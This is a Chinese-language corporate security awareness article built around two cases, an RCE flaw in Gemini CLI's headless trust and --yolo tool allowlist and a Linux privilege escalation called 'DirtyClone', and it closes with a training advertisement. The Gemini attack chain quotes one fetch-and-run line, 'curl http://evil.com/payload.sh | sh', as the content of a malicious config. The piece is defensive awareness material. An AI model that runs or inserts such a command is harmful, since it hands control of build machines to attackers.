“防不胜防”是古人的警示,今天的“防”已不再是城墙与护城河,而是一行行代码、一段段脚本,甚至是我们在 CI/CD 管道里不经意敲下的 “yolo”。在信息化、智能化、数智化交织的当下,职场的每一位同事,都可能在不经意间成为“攻击者的跳板”。本文将通过两个鲜活的安全事件案例,剖析其根源与危害,帮助大家在日常工作中筑起更坚固的安全防线,并呼吁全员积极参与即将开启的信息安全意识培训,共同提升安全素养、知识与技能。

案例一:Gemini CLI 零日漏洞——CI/CD 环境的暗影杀手
事件概述
2026 年 6 月底,Google 发布安全公告,披露其 AI 命令行工具 Gemini CLI 以及对应的 GitHub Action(run‑gemini‑cli)存在 GHSA‑wpqr‑6v78‑jr5g(对应 CVE‑2026‑12537)的极高危漏洞,CVSS 评分达 10.0,堪称“一键直达系统核心”。漏洞主要体现在两大机制缺陷:
- Headless 模式自动信任工作区:在无交互的 Headless 环境下,Gemini CLI 默认信任工作区目录,直接加载该目录下的
.gemini配置文件和环境变量。若攻击者在 CI/CD 工作流中植入恶意.gemini,工具在执行时便会读取并执行其中的恶意指令。 - –yolo 模式工具允许运行清单失效:–yolo(大胆模式)本应在用户主动确认后才放宽工具执行限制,但实现时对 “工具允许清单”(Tool Allowlist) 的校验逻辑缺失,导致攻击者可随意调用系统已安装的任意可执行文件,进而实现 任意代码执行(RCE)。
攻击链示意如下:
- 攻击者在 GitHub 仓库的 CI 工作流中插入恶意
.gemini配置,内容包含!curl http://evil.com/payload.sh | sh。 - CI 触发时,Gemini CLI 以 Headless 模式运行,自动加载
.gemini,执行恶意指令。 - 在 –yolo 模式下,攻击者进一步利用系统已有的
curl、bash等工具执行远程代码,完成对构建机器的完全控制。
影响范围
- 受影响版本:Gemini CLI 0.39.1 及以下、0.40.0‑preview.3,run‑gemini‑cli 0.1.22 及以下。
- 受危害环境:所有使用 GitHub Actions、GitLab CI、Jenkins 等自动化流水线,且在流水线中调用 Gemini CLI 的项目。尤其是 AI 开发、ModelOps、数据标注等与大模型交互频繁的团队,风险更甚。
- 潜在损失:攻击者可在构建机器上植入后门、窃取源码、篡改模型参数,甚至利用算力进行加密货币挖矿、勒索等恶意活动。一次泄露,可能导致数千万研发投入化为乌有,更有可能牵连合作伙伴的商业机密,形成 供应链攻击。
修复与防御
Google 已在 Gemini CLI 0.39.1→0.40.0‑preview.3 与 run‑gemini‑cli 0.1.22→0.1.23 中实现以下关键改动:
- Headless 模式默认不信任工作区,需显式使用
--trusted-workspace参数指明受信任目录。 - –yolo 模式强化工具清单校验,只允许在白名单内的工具执行,且每一次执行都必须经过审计日志记录。
- 安全审计日志增强:新增
gemini-audit.log,记录每一次工作区加载、环境变量注入、外部命令调用的细节,方便事后取证。
最佳实践(适用于所有 CI/CD 环境):
- 升级至已修补版本,并在 CI 脚本中锁定版本(例如使用
[email protected])。 - 禁用 Headless 自动信任:在 CI 配置中显式加入
--no-auto-trust或--trusted-workspace。 - 审查 .gemini 配置:将
.gemini文件加入代码审查(Code Review)链路,禁止未经审计的改动。 - 最小权限原则:CI 运行者只授予必要的系统权限,避免使用 root 或拥有 sudo 权限的 Runner。
- 日志监控:部署 SIEM 或 CloudWatch 监控
gemini-audit.log,对异常加载或工具调用即时告警。
案例二:Linux 本地提权漏洞 DirtyClone —— “复制粘贴”也能送命
事件概述
2026 年 6 月 29 日,安全研究团队披露了 Linux 内核新发现的本地提权漏洞 DirtyClone,CVSS 评分 8.8。该漏洞根植于内核实现的 clone(2) 系统调用在处理用户空间映射时的复制粘贴(copy‑on‑write)逻辑错误。攻击者仅需在本地拥有普通用户权限,即可通过特制的 dirty_clone 程序触发内核写入任意内存,从而提升为 root 权限。
攻击步骤概括:
- 普通用户运行
dirty_clone,该程序利用 Clone 系统调用创建子进程并共享内存页。 - 通过精心构造的 VM_MERGE 参数,引导内核错误地复制已标记为 “脏” 的页到另一个进程的页表中。
- 进程获得对关键内核结构(如
cred)的写权限,直接修改 UID 为 0,实现提权。
影响范围
- 受影响内核版本:Linux 5.18 至 7.1‑rc6(包括多种分支的公开发行版)。
- 受危害系统:所有使用受影响内核的服务器、工作站、容器镜像。特别是 云原生环境 中的容器节点,往往运行的是最新的内核版本,易被波及。
实际危害场景
- 内部渗透:攻击者获得普通用户帐号(譬如在内部开发环境的普通工号),即可悄无声息地提权为 root,进一步窃取源代码、数据库密码。
- 容器逃逸:在 Kubernetes 集群中,一旦容器中的恶意进程利用 DirtyClone 提权,便可能突破容器命名空间限制,攻击宿主机甚至同一节点的其他容器,形成 横向移动。
- 供应链破坏:攻击者在 CI/CD 构建机器上利用该漏洞植入后门,后续所有基于该机器产出的镜像都将携带后门,导致供应链整体受灾。
防御与应急响应
- 紧急升级:官方已在 Linux 5.18.23、6.1.17、7.1‑rc7 等版本中修复。务必在维护窗口内完成内核升级。
- 容器安全加固:开启 Seccomp、AppArmor、SELinux 等强制访问控制,限制容器对
clone系统调用的使用。 - 最小化特权容器:避免以
privileged模式运行容器,尽量使用 non‑root 用户。 - 监控异常系统调用:利用 eBPF 或 Falco 等工具实时监控
clone、execve的异常参数组合,快速发现异常行为。 - 定期渗透测试:在内部安全评估中加入本地提权链路的验证,确保防御措施生效。
从案例走向思考:数智化时代的安全底线
上述两个案例虽分别针对 AI 开发工具链 与 操作系统内核,但它们共同映射出一种趋势:技术越先进,攻击面的宽度越大。在具身智能化、数据化、数智化融合的今天,企业的业务流程几乎被 API、脚本、自动化 彻底拆解,任何一次“快捷”,都潜藏着“漏洞”。正如《孙子兵法》云:“兵贵神速”,信息安全同样需要 速度与精准——快速发现、精准定位、即时响应。

1. 具身智能化(Embodied Intelligence)如何放大风险?
具身智能化让机器人、IoT 设备具备感知与决策能力。每一个传感器的数据流、每一次本地推理,都可能在 边缘节点 运行未经严格审计的第三方库。若边缘设备的固件中存在未修补的 CVE,攻击者只需一次网络投喂便可取得 物理层面的控制,进而导致生产线停摆、数据泄漏。
2. 数据化(Datafication)带来的隐私隐患
企业正将业务过程“数据化”,用 大数据平台、数据湖 进行分析决策。数据治理若缺乏 访问控制 与 审计追踪,内部人员或外部渗透者即可利用 数据镜像 进行信息抽取,形成商业情报甚至 国家级情报 的泄露。
3. 数智化(Intelligent Digitalization)与 AI 供给链的安全
AI 模型从研发到部署,经历 数据采集 → 训练 → 推理 → 监控 全链路。每一步骤都可能被 供应链攻击(Supply‑Chain Attack)利用。Gemini CLI 漏洞本身即是 AI 开发工具链 的安全盲点,一旦被渗透,模型可能被 后门注入,输出不可靠甚至恶意内容。
信息安全意识培训:从“被动防御”到“主动赋能”
面对上述多层次、多维度的威胁,单靠技术防护是不够的。人的因素、流程的健全、文化的沉淀,才是 安全生态 的根基。为此,公司计划于 7 月中旬 开启为期 两周 的信息安全意识培训,内容涵盖:
- 安全基础:密码学、网络协议、常见攻击手法(Phishing、RCE、Supply‑Chain)。
- CI/CD 安全:最小权限、签名校验、流水线审计。
- 容器与云原生安全:镜像签名、运行时防护、K8s RBAC。
- AI/数据安全:模型防篡改、数据脱敏、隐私计算。
- 应急演练:红蓝对抗、漏洞复现、日志追踪。
培训的独特价值
- 情境式学习:通过还原 Gemini CLI、DirtyClone 等真实案例,让学员在“模拟攻击”中体会风险,记忆更深刻。
- 跨部门协作:邀请研发、运维、法务、HR 四大块负责人共同参与,形成 全链路安全共识。
- 认证积分:完成课程并通过线上测评的同事,可获得公司内部的 信息安全徽章,在年度评优、岗位晋升中加分。
- 持续更新:培训结束后,我们将搭建 安全知识库 与 微课推送,保持信息安全学习的 滚动式 更新。
“学而时习之,不亦说乎?”(《论语》)
信息安全不只是一次性的演练,而是 持续的自我升级。只有每一位同事都把安全视为日常工作的一部分,才能在技术迭代的浪潮中保持 “未雨绸缪”。
行动指南:从今天起,你可以这样做
| 步骤 | 具体行动 | 目的 |
|---|---|---|
| 1 | 立即检查本机及 CI 环境中使用的 Gemini CLI、run‑gemini‑cli 版本;若低于 0.40.0‑preview.3,立刻升级。 | 防止已知 RCE 漏洞被利用 |
| 2 | 审计项目根目录下的 .gemini、.env、.gitignore 等配置文件,确保未出现可疑指令。 |
消除潜在的恶意载入 |
| 3 | 开启 CI 日志的细粒度审计,特别是 git clone、docker build、curl 等外部请求记录。 |
及时发现异常行为 |
| 4 | 更新服务器内核至官方已修补的版本,参照公司内部安全基线。 | 消除 DirtyClone 等本地提权风险 |
| 5 | 启用容器安全策略(Seccomp、AppArmor),并在 CI 中使用 非 root 用户运行构建脚本。 | 降低容器逃逸攻击面 |
| 6 | 报名即将开启的信息安全意识培训,完成线上预习材料。 | 提升个人安全能力,获取官方认证 |
| 7 | 分享学习心得至公司内部安全社区,帮助同事共同进步。 | 构建安全文化,形成知识沉淀 |
结语:让安全成为组织的“软实力”
在数字化转型的浪潮里,技术是锋利的剑,安全是坚固的盾。我们不可能把每一行代码都写得坚不可摧,但我们可以让 每一位员工 成为 第一道防线。正如《礼记·大学》所说:“格物致知,诚意正心”。在信息安全的世界里,“格物”即是不断探究系统的细节,“致知”则是把这些知识转化为防护能力;“诚意正心”则是每个人心怀对企业、对同事的责任感与敬业精神。
让我们携手,在即将到来的信息安全意识培训中,一起 学会发现、学会防御、学会响应。只有当安全意识成为每一天的习惯,企业才能在数智化的高速赛道上 稳步前行,而不被意外的“暗流”卷走。
今天的防护,是明天的竞争力。

信息安全意识培训,期待与你相约!
昆明亭长朗然科技有限公司提供定制化的安全事件响应培训,帮助企业在面临数据泄露或其他安全威胁时迅速反应。通过我们的培训计划,员工将能够更好地识别和处理紧急情况。有需要的客户可以联系我们进行详细了解。
- 电话:0871-67122372
- 微信、手机:18206751343
- 邮件:info@securemymind.com
- QQ: 1767022898